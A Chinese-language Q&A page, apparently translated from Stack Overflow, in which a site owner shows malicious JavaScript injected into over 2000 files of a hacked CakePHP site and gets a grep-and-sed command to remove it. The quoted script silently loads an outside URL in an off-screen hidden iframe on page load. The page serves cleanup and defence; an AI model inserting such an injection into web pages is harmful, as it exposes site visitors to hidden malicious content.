昨天我的网站被黑了,它的代码如下:
<script>
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"http://fenwaywest.com/media/index.php\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>";
当我使用以下命令搜索服务器以查找受影响的文件时
grep -r "<script> function frmAdd()" /path/
我有超过 2000 个文件。
现在我只需要删除该行。请问,有人可以引导该命令仅删除所有 2000 个文件中的该行吗?
最佳答案
先备份!然后,你可以尝试这样的事情:
grep -lr " function frmAdd" /path/ | xargs sed -i '/ function frmAdd/d'
这将删除与该正则表达式匹配的任何行。它还假设路径不包含空格(希望这是一个合理的假设)。
关于linux - 需要使用linux命令删除cakephp脚本中的病毒代码,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/12820020/